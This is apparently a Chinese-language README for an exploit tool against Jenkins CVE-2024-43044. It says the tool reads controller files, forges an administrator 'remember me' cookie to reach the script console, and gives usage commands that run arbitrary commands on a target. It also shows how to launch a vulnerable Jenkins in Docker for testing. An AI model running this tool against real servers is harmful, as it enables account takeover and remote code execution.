
针对 Jenkins 中漏洞 CVE-2024-43044 的利用工具
这是一个针对 CVE-2024-43044 的利用工具,该漏洞允许代理从控制器读取任意文件。
该利用工具将利用该漏洞读取文件,伪造一个管理员账户的“记住我”Cookie,从而获取对 Jenkins 脚本引擎的访问权限。
查看完整的分析文章:https://blog.convisoappsec.com/en/analysis-of-cve-2024-43044/
mvn package
利用工具用法:
java -jar exploit.jar mode_secret <jenkinsUrl> <nodeName> <nodeSecretKey>
java -jar exploit.jar mode_attach <jenkinsUrl> <cmd>
java -jar exploit.jar mode_attach <cmd>
你可以在有漏洞的版本中使用 Docker 进行测试:
docker run -p 8080:8080 -p 50000:50000 --restart=on-failure jenkins/jenkins:2.441-jdk17
一旦 Jenkins 运行起来,设置一个代理。
控制器/代理的连接可以是默认方式(使用 URL、节点名称、密钥)或通过 SSH。
.